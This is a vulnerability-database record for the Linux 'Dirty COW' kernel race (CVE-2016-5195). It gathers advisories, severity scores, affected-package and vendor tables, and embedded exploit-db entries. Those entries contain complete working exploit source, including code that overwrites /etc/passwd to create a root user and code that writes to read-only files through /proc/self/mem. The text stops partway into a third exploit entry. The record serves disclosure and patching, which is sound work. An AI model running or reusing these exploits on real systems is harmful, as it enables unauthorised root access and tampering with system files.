{"id": "USN-3106-1", "bulletinFamily": "unix", "title": "Linux kernel vulnerability", "description": "It was discovered that a race condition existed in the memory manager of \nthe Linux kernel when handling copy-on-write breakage of private read-only \nmemory mappings. A local attacker could use this to gain administrative \nprivileges.", "published": "2016-10-20T00:00:00", "modified": "2016-10-20T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://ubuntu.com/security/notices/USN-3106-1", "reporter": "Ubuntu", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2016-5195"], "cvelist": ["CVE-2016-5195"], "type": "ubuntu", "lastseen": "2020-07-18T01:46:26", "edition": 6, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B6D57715-C0B3-48BB-8FDE-F3868F92DB1F"]}, {"type": "android", "idList": ["ANDROID:CVE-2016-5195", "ANDROID:DIRTYC0W"]}, {"type": "cve", "idList": ["CVE-2016-5195"]}, {"type": "f5", "idList": ["SOL10558632", "F5:K10558632"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310842922", "OPENVAS:1361412562310842920", "OPENVAS:1361412562310809932", "OPENVAS:1361412562310842925", "OPENVAS:1361412562310842926", "OPENVAS:1361412562310842921", "OPENVAS:1361412562310882584", "OPENVAS:1361412562310842923", "OPENVAS:1361412562310140175", "OPENVAS:1361412562310108768"]}, {"type": "oraclelinux", "idList": ["ELSA-2016-2105"]}, {"type": "nessus", "idList": ["ORACLELINUX_ELSA-2016-3634.NASL", "UBUNTU_USN-3104-1.NASL", "ORACLELINUX_ELSA-2016-2105.NASL", "UBUNTU_USN-3106-3.NASL", "CENTOS_RHSA-2016-2105.NASL", "SUSE_SU-2016-2585-1.NASL", "SL_20161024_KERNEL_ON_SL7_X.NASL", "F5_BIGIP_SOL10558632.NASL", "ORACLELINUX_ELSA-2016-3632.NASL", "SUSE_SU-2016-2657-1.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-25952", "1337DAY-ID-26431", "1337DAY-ID-26429", "1337DAY-ID-26430", "1337DAY-ID-26446"]}, {"type": "exploitdb", "idList": ["EDB-ID:40616", "EDB-ID:40838", "EDB-ID:40839"]}, {"type": "suse", "idList": ["SUSE-SU-2016:2657-1", "SUSE-SU-2016:2585-1", "SUSE-SU-2016:2593-1", "SUSE-SU-2016:2614-1"]}, {"type": "redhat", "idList": ["RHSA-2016:2106", "RHSA-2016:2127", "RHSA-2016:2105", "RHSA-2016:2126"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20161207-01-DIRTYCOW"]}, {"type": "myhack58", "idList": ["MYHACK58:62201680403"]}, {"type": "seebug", "idList": ["SSV:92488", "SSV:96908"]}, {"type": "slackware", "idList": ["SSA-2016-305-01"]}, {"type": "saint", "idList": ["SAINT:D99FE3AF85FA3F5D4D5C3CB8B43F5183", "SAINT:1E3BA1480EBC78481EFFC9BD1CFFBBE2", "SAINT:ACA0D81E9F0D7499A5952D634DA1559F"]}, {"type": "archlinux", "idList": ["ASA-201610-14", "ASA-201610-16"]}, {"type": "ubuntu", "idList": ["USN-3107-2", "USN-3104-1", "USN-3107-1", "USN-3105-2", "USN-3106-4"]}, {"type": "amazon", "idList": ["ALAS-2016-757"]}, {"type": "centos", "idList": ["CESA-2016:2098", "CESA-2016:2105"]}, {"type": "vmware", "idList": ["VMSA-2016-0018"]}, {"type": "cisa", "idList": ["CISA:374B105C289CECEBE37852514EEBDF8A"]}, {"type": "thn", "idList": ["THN:6681D64EFC53E13356AF1184CE1D6024", "THN:B571C1AAA8CDDC10150ABA0BF22B19E6"]}, {"type": "fedora", "idList": ["FEDORA:800BC60776C5", "FEDORA:9A84E605A374"]}, {"type": "cisco", "idList": ["CISCO-SA-20161026-LINUX"]}, {"type": "cert", "idList": ["VU:243144"]}], "modified": "2020-07-18T01:46:26", "rev": 2}, "score": {"value": 6.8, "vector": "NONE", "modified": "2020-07-18T01:46:26", "rev": 2}, "vulnersScore": 6.8}, "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "16.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-45-powerpc64-smp", "packageVersion": "4.4.0-45.66"}, {"OS": "Ubuntu", "OSVersion": "16.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-45-powerpc-e500mc", "packageVersion": "4.4.0-45.66"}, {"OS": "Ubuntu", "OSVersion": "16.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-45-generic", "packageVersion": "4.4.0-45.66"}, {"OS": "Ubuntu", "OSVersion": "16.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-45-generic-lpae", "packageVersion": "4.4.0-45.66"}, {"OS": "Ubuntu", "OSVersion": "16.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-45-lowlatency", "packageVersion": "4.4.0-45.66"}, {"OS": "Ubuntu", "OSVersion": "16.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-45-powerpc-smp", "packageVersion": "4.4.0-45.66"}, {"OS": "Ubuntu", "OSVersion": "16.04", "arch": "noarch", "operator": "lt", "packageFilename": "UNKNOWN", "packageName": "linux-image-4.4.0-45-powerpc64-emb", "packageVersion": "4.4.0-45.66"}], "scheme": null}

{"attackerkb": [{"lastseen": "2020-11-22T06:19:47", "bulletinFamily": "info", "cvelist": ["CVE-2016-5195"], "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \u201cDirty COW.\u201d\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 22, 2020 3:23am UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-06-05T00:00:00", "published": "2016-11-10T00:00:00", "id": "AKB:B6D57715-C0B3-48BB-8FDE-F3868F92DB1F", "href": "https://attackerkb.com/topics/E6o7dgfSHk/cve-2016-5195", "type": "attackerkb", "title": "CVE-2016-5195", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "android": [{"lastseen": "2020-06-22T14:42:11", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \"Dirty COW.\"", "edition": 1, "modified": "2019-07-29T00:00:00", "published": "2016-11-01T00:00:00", "id": "ANDROID:CVE-2016-5195", "href": "http://www.androidvulnerabilities.org/vulnerabilities/CVE-2016-5195.html", "title": "CVE-2016-5195", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T13:21:10", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "A race condition in the Linux kernel's handling of copy-on-write (COW) operations means that users can gain write access to otherwise read-only areas of memory and gain permissions", "edition": 2, "modified": "2019-07-09T00:00:00", "published": "2016-10-13T00:00:00", "id": "ANDROID:DIRTYC0W", "href": "http://www.androidvulnerabilities.org/vulnerabilities/dirtyc0w.html", "title": "dirtyc0w", "type": "android", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2021-02-02T06:28:08", "description": "Race condition in mm/gup.c in the Linux kernel 2.x through 4.x before 4.8.3 allows local users to gain privileges by leveraging incorrect handling of a copy-on-write (COW) feature to write to a read-only memory mapping, as exploited in the wild in October 2016, aka \"Dirty COW.\"", "edition": 18, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-10T21:59:00", "title": "CVE-2016-5195", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5195"], "modified": "2020-02-17T16:15:00", "cpe": ["cpe:/o:redhat:enterprise_linux_aus:6.2", "cpe:/o:redhat:enterprise_linux_eus:7.1", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux_long_life:5.6", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:canonical:ubuntu_linux:12.04", "cpe:/o:canonical:ubuntu_linux:16.04", "cpe:/o:redhat:enterprise_linux_eus:6.6", "cpe:/o:redhat:enterprise_linux:7.0", "cpe:/o:redhat:enterprise_linux_aus:6.5", "cpe:/o:redhat:enterprise_linux_eus:6.7", "cpe:/o:redhat:enterprise_linux_tus:6.5", "cpe:/o:debian:debian_linux:7.0", "cpe:/o:redhat:enterprise_linux_long_life:5.9", "cpe:/o:redhat:enterprise_linux_aus:6.4", "cpe:/o:canonical:ubuntu_core:15.04", "cpe:/o:redhat:enterprise_linux:6.0"], "id": "CVE-2016-5195", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-5195", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_long_life:5.6:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_core:15.04:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_long_life:5.9:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:7.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.4:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:6.7:*:*:*:*:*:*:*", "cpe:2.3:o:canonical:ubuntu_linux:12.04:*:*:*:lts:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_tus:6.5:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_eus:6.6:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:7.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_aus:6.5:*:*:*:*:*:*:*"]}], "f5": [{"lastseen": "2020-04-06T22:40:20", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "description": "\nF5 Product Development has assigned IDs 624457 and 624459 (BIG-IP), ID 625230 (BIG-IQ), ID 625231 (Enterprise Manager), INSTALLER-2794 (Traffix SDC), and ID 625362 (F5 iWorkflow) to this vulnerability. Additionally, [F5 iHealth](<https://www.f5.com/services/support/support-offerings/big-ip-ihealth-diagnostic-tool>) may list Heuristic H624248 on the **Diagnostics** &gt; **Identified** &gt; **High** page. \n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases, point releases, or hotfixes that address the vulnerability, refer to the following table.\n\nProduct | Versions known to be vulnerable | Versions known to be not vulnerable | Severity | Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP AAM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP AFM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP Analytics | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP APM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP ASM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP DNS | 12.0.0 - 12.1.2 | 13.0.0 \n12.1.2 HF1 | High | Linux kernel \nBIG-IP Edge Gateway | 11.2.1 \n10.2.1 - 10.2.4 | None | High | Linux kernel \nBIG-IP GTM | 11.4.0 - 11.6.1 \n11.2.1 | 11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP Link Controller | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1 | 13.0.0 \n12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP PEM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP PSM | 12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n11.6.2 \n11.6.1 HF2 \n11.5.5 \n11.5.4 HF3 | High | Linux kernel \nBIG-IP WebAccelerator | 11.2.1 | None | High | Linux kernel \nBIG-IP WOM | 11.2.1 | None | High | Linux kernel \nBIG-IP WebSafe | 12.0.0 - 12.1.2 \n11.6.0 - 11.6.1 | 13.0.0 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b12.1.2 HF1 \n\u200b\u200b\u200b\u200b\u200b\u200b\u200b11.6.2 \n11.6.1 HF2 | High | Linux kernel \nARX | None | 6.2.0 - 6.4.0 | Not vulnerable | None \nEnterprise Manager | 3.1.1 | 3.1.1 HF8 | High | Linux kernel \nBIG-IQ Cloud | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Device | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ Security | 4.0.0 - 4.5.0 | None | High | Linux kernel \nBIG-IQ ADC | 4.5.0 | None | High | Linux kernel \nBIG-IQ Centralized Management | 5.0.0 - 5.1.0 \n4.6.0 | 5.2.0 - 5.3.0 | High | Linux kernel \nF5 iWorkflow | 2.0.0 - 2.0.1 | 2.0.2 - 2.3.0 | High | Linux kernel \nBIG-IQ Cloud and Orchestration | 1.0.0 | None | High | Linux kernel \nLineRate | None | 2.5.0 - 2.6.1 | Not vulnerable | None \nTraffix SDC | 5.0.0 \n4.0.0 - 4.4.0 | None | Low | Linux kernel \n \nF5 will not develop a fix for vulnerable products that do not already have a fixed version listed in this article, and will not update this table with subsequent vulnerable releases in the associated branches. F5 recommends that you update to more recent, non-vulnerable versions whenever feasible. For more information, refer to [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable **column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo determine the necessary upgrade path for your BIG-IQ system, you should understand the BIG-IQ product offering name changes. For more information, refer to [K21232150: Considerations for upgrading BIG-IQ or F5 iWorkflow systems](<https://support.f5.com/csp/article/K21232150>).\n\nMitigation\n\nNone\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 15.x)](<https://support.f5.com/csp/article/K13123>)\n", "edition": 1, "modified": "2019-09-26T18:41:00", "published": "2016-10-21T18:38:00", "id": "F5:K10558632", "href": "https://support.f5.com/csp/article/K10558632", "title": "Linux privilege-escalation vulnerability CVE-2016-5195 ", "type": "f5", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-21T17:25:15", "bulletinFamily": "software", "cvelist": ["CVE-2016-5195"], "edition": 1, "description": "Supplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "modified": "2016-10-21T00:00:00", "published": "2016-10-21T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/k/10/sol10558632.html", "id": "SOL10558632", "type": "f5", "title": "SOL10558632 - Linux privilege-escalation vulnerability (Dirty COW) CVE-2016-5195", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2016-11-28T21:23:40", "description": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation. CVE-2016-5195. Local exploit for Linux platform", "published": "2016-11-28T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-28T00:00:00", "id": "EDB-ID:40839", "href": "https://www.exploit-db.com/exploits/40839/", "sourceData": "//\r\n// This exploit uses the pokemon exploit as a base and automatically\r\n// generates a new passwd line. The original /etc/passwd is then\r\n// backed up to /tmp/passwd.bak and overwritten with the new line.\r\n// The user will be prompted for the new password when the binary is run.\r\n// After running the exploit you should be able to login with the newly\r\n// created user.\r\n//\r\n// Original exploit:\r\n// https://github.com/dirtycow/dirtycow.github.io/blob/master/pokemon.c\r\n//\r\n// To use this exploit modify the user values according to your needs\r\n//\r\n// Compile with\r\n//\r\n// gcc -pthread dirty.c -o dirty -lcrypt\r\n//\r\n// and just run the newly create binary with ./dirty\r\n//\r\n// DON'T FORGET TO RESTORE YOUR /etc/passwd AFTER RUNNING THE EXPLOIT !\r\n//\r\n// Exploit adopted by Christian \"FireFart\" Mehlmauer\r\n// https://firefart.at\r\n//\r\n\r\n\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <string.h>\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <sys/mman.h>\r\n#include <sys/types.h>\r\n#include <sys/stat.h>\r\n#include <sys/wait.h>\r\n#include <sys/ptrace.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <crypt.h>\r\n\r\nconst char *filename = \"/etc/passwd\";\r\nconst char *backup_filename = \"/tmp/passwd.bak\";\r\nconst char *salt = \"firefart\";\r\n\r\nint f;\r\nvoid *map;\r\npid_t pid;\r\npthread_t pth;\r\nstruct stat st;\r\n\r\nstruct Userinfo {\r\n char *username;\r\n char *hash;\r\n int user_id;\r\n int group_id;\r\n char *info;\r\n char *home_dir;\r\n char *shell;\r\n};\r\n\r\nchar *generate_password_hash(char *plaintext_pw) {\r\n return crypt(plaintext_pw, salt);\r\n}\r\n\r\nchar *generate_passwd_line(struct Userinfo u) {\r\n const char *format = \"%s:%s:%d:%d:%s:%s:%s\\n\";\r\n int size = snprintf(NULL, 0, format, u.username, u.hash,\r\n u.user_id, u.group_id, u.info, u.home_dir, u.shell);\r\n char *ret = malloc(size + 1);\r\n sprintf(ret, format, u.username, u.hash, u.user_id,\r\n u.group_id, u.info, u.home_dir, u.shell);\r\n return ret;\r\n}\r\n\r\nvoid *madviseThread(void *arg) {\r\n int i, c = 0;\r\n for(i = 0; i < 200000000; i++) {\r\n c += madvise(map, 100, MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\", c);\r\n}\r\n\r\nint copy_file(const char *from, const char *to) {\r\n // check if target file already exists\r\n if(access(to, F_OK) != -1) {\r\n printf(\"File %s already exists! Please delete it and run again\\n\",\r\n to);\r\n return -1;\r\n }\r\n\r\n char ch;\r\n FILE *source, *target;\r\n\r\n source = fopen(from, \"r\");\r\n if(source == NULL) {\r\n return -1;\r\n }\r\n target = fopen(to, \"w\");\r\n if(target == NULL) {\r\n fclose(source);\r\n return -1;\r\n }\r\n\r\n while((ch = fgetc(source)) != EOF) {\r\n fputc(ch, target);\r\n }\r\n\r\n printf(\"%s successfully backed up to %s\\n\",\r\n from, to);\r\n\r\n fclose(source);\r\n fclose(target);\r\n\r\n return 0;\r\n}\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n // backup file\r\n int ret = copy_file(filename, backup_filename);\r\n if (ret != 0) {\r\n exit(ret);\r\n }\r\n\r\n struct Userinfo user;\r\n // set values, change as needed\r\n user.username = \"firefart\";\r\n user.user_id = 0;\r\n user.group_id = 0;\r\n user.info = \"pwned\";\r\n user.home_dir = \"/root\";\r\n user.shell = \"/bin/bash\";\r\n\r\n char *plaintext_pw = getpass(\"Please enter new password: \");\r\n user.hash = generate_password_hash(plaintext_pw);\r\n char *complete_passwd_line = generate_passwd_line(user);\r\n printf(\"Complete line:\\n%s\\n\", complete_passwd_line);\r\n\r\n f = open(filename, O_RDONLY);\r\n fstat(f, &st);\r\n map = mmap(NULL,\r\n st.st_size + sizeof(long),\r\n PROT_READ,\r\n MAP_PRIVATE,\r\n f,\r\n 0);\r\n printf(\"mmap: %lx\\n\",(unsigned long)map);\r\n pid = fork();\r\n if(pid) {\r\n waitpid(pid, NULL, 0);\r\n int u, i, o, c = 0;\r\n int l=strlen(complete_passwd_line);\r\n for(i = 0; i < 10000/l; i++) {\r\n for(o = 0; o < l; o++) {\r\n for(u = 0; u < 10000; u++) {\r\n c += ptrace(PTRACE_POKETEXT,\r\n pid,\r\n map + o,\r\n *((long*)(complete_passwd_line + o)));\r\n }\r\n }\r\n }\r\n printf(\"ptrace %d\\n\",c);\r\n }\r\n else {\r\n pthread_create(&pth,\r\n NULL,\r\n madviseThread,\r\n NULL);\r\n ptrace(PTRACE_TRACEME);\r\n kill(getpid(), SIGSTOP);\r\n pthread_join(pth,NULL);\r\n }\r\n\r\n printf(\"Done! Check %s to see if the new user was created\\n\", filename);\r\n printf(\"You can log in with username %s and password %s.\\n\\n\",\r\n user.username, plaintext_pw);\r\n printf(\"\\nDON'T FORGET TO RESTORE %s FROM %s !!!\\n\\n\",\r\n filename, backup_filename);\r\n return 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40839/"}, {"lastseen": "2016-10-21T21:29:10", "description": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access). CVE-2016-5195. Local exploit for Linux platform", "published": "2016-10-19T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-10-19T00:00:00", "id": "EDB-ID:40611", "href": "https://www.exploit-db.com/exploits/40611/", "sourceData": "/*\r\n####################### dirtyc0w.c #######################\r\n$ sudo -s\r\n# echo this is not a test > foo\r\n# chmod 0404 foo\r\n$ ls -lah foo\r\n-r-----r-- 1 root root 19 Oct 20 15:23 foo\r\n$ cat foo\r\nthis is not a test\r\n$ gcc -lpthread dirtyc0w.c -o dirtyc0w\r\n$ ./dirtyc0w foo m00000000000000000\r\nmmap 56123000\r\nmadvise 0\r\nprocselfmem 1800000000\r\n$ cat foo\r\nm00000000000000000\r\n####################### dirtyc0w.c #######################\r\n*/\r\n#include <stdio.h>\r\n#include <sys/mman.h>\r\n#include <fcntl.h>\r\n#include <pthread.h>\r\n#include <unistd.h>\r\n#include <sys/stat.h>\r\n#include <string.h>\r\n \r\nvoid *map;\r\nint f;\r\nstruct stat st;\r\nchar *name;\r\n \r\nvoid *madviseThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n int i,c=0;\r\n for(i=0;i<100000000;i++)\r\n {\r\n/*\r\nYou have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661\r\n> This is achieved by racing the madvise(MADV_DONTNEED) system call\r\n> while having the page of the executable mmapped in memory.\r\n*/\r\n c+=madvise(map,100,MADV_DONTNEED);\r\n }\r\n printf(\"madvise %d\\n\\n\",c);\r\n}\r\n \r\nvoid *procselfmemThread(void *arg)\r\n{\r\n char *str;\r\n str=(char*)arg;\r\n/*\r\nYou have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16\r\n> The in the wild exploit we are aware of doesn't work on Red Hat\r\n> Enterprise Linux 5 and 6 out of the box because on one side of\r\n> the race it writes to /proc/self/mem, but /proc/self/mem is not\r\n> writable on Red Hat Enterprise Linux 5 and 6.\r\n*/\r\n int f=open(\"/proc/self/mem\",O_RDWR);\r\n int i,c=0;\r\n for(i=0;i<100000000;i++) {\r\n/*\r\nYou have to reset the file pointer to the memory position.\r\n*/\r\n lseek(f,map,SEEK_SET);\r\n c+=write(f,str,strlen(str));\r\n }\r\n printf(\"procselfmem %d\\n\\n\", c);\r\n}\r\n \r\n \r\nint main(int argc,char *argv[])\r\n{\r\n/*\r\nYou have to pass two arguments. File and Contents.\r\n*/\r\n if (argc<3)return 1;\r\n pthread_t pth1,pth2;\r\n/*\r\nYou have to open the file in read only mode.\r\n*/\r\n f=open(argv[1],O_RDONLY);\r\n fstat(f,&st);\r\n name=argv[1];\r\n/*\r\nYou have to use MAP_PRIVATE for copy-on-write mapping.\r\n> Create a private copy-on-write mapping. Updates to the\r\n> mapping are not visible to other processes mapping the same\r\n> file, and are not carried through to the underlying file. It\r\n> is unspecified whether changes made to the file after the\r\n> mmap() call are visible in the mapped region.\r\n*/\r\n/*\r\nYou have to open with PROT_READ.\r\n*/\r\n map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);\r\n printf(\"mmap %x\\n\\n\",map);\r\n/*\r\nYou have to do it on two threads.\r\n*/\r\n pthread_create(&pth1,NULL,madviseThread,argv[1]);\r\n pthread_create(&pth2,NULL,procselfmemThread,argv[2]);\r\n/*\r\nYou have to wait for the threads to finish.\r\n*/\r\n pthread_join(pth1,NULL);\r\n pthread_join(pth2,NULL);\r\n return 0;\r\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40611/"}, {"lastseen": "2016-11-29T17:23:22", "description": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd). CVE-2016-5195. Local exploit for Linux platform", "published": "2016-11-27T00:00:00", "type": "exploitdb", "title": "Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-5195"], "modified": "2016-11-27T00:00:00", "id": "EDB-ID:40847", "href": "https://www.exploit-db.com/exploits/40847/", "sourceData": "// EDB-Note: Compile: g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil\r\n// EDB-Note: Recommended way to run: ./dcow -s (Will automatically do \"echo 0 > /proc/sys/vm/dirty_writeback_centisecs\")\r\n//\r\n// -----------------------------------------------------------------\r\n// Copyright (C) 2016 Gabriele Bonacini\r\n//\r\n// This program is free software; you can redistribute it and/or modify\r\n// it under the terms of the GNU General Public License as published by\r\n// the Free Software Foundation; either version 3 of the License, or\r\n// (at your option) any later version.\r\n// This program is distributed in the hope that it will be useful,\r\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n// GNU General Public License for more details.\r\n// You should have received a copy of the GNU General Public License\r\n// along with this program; if not, write 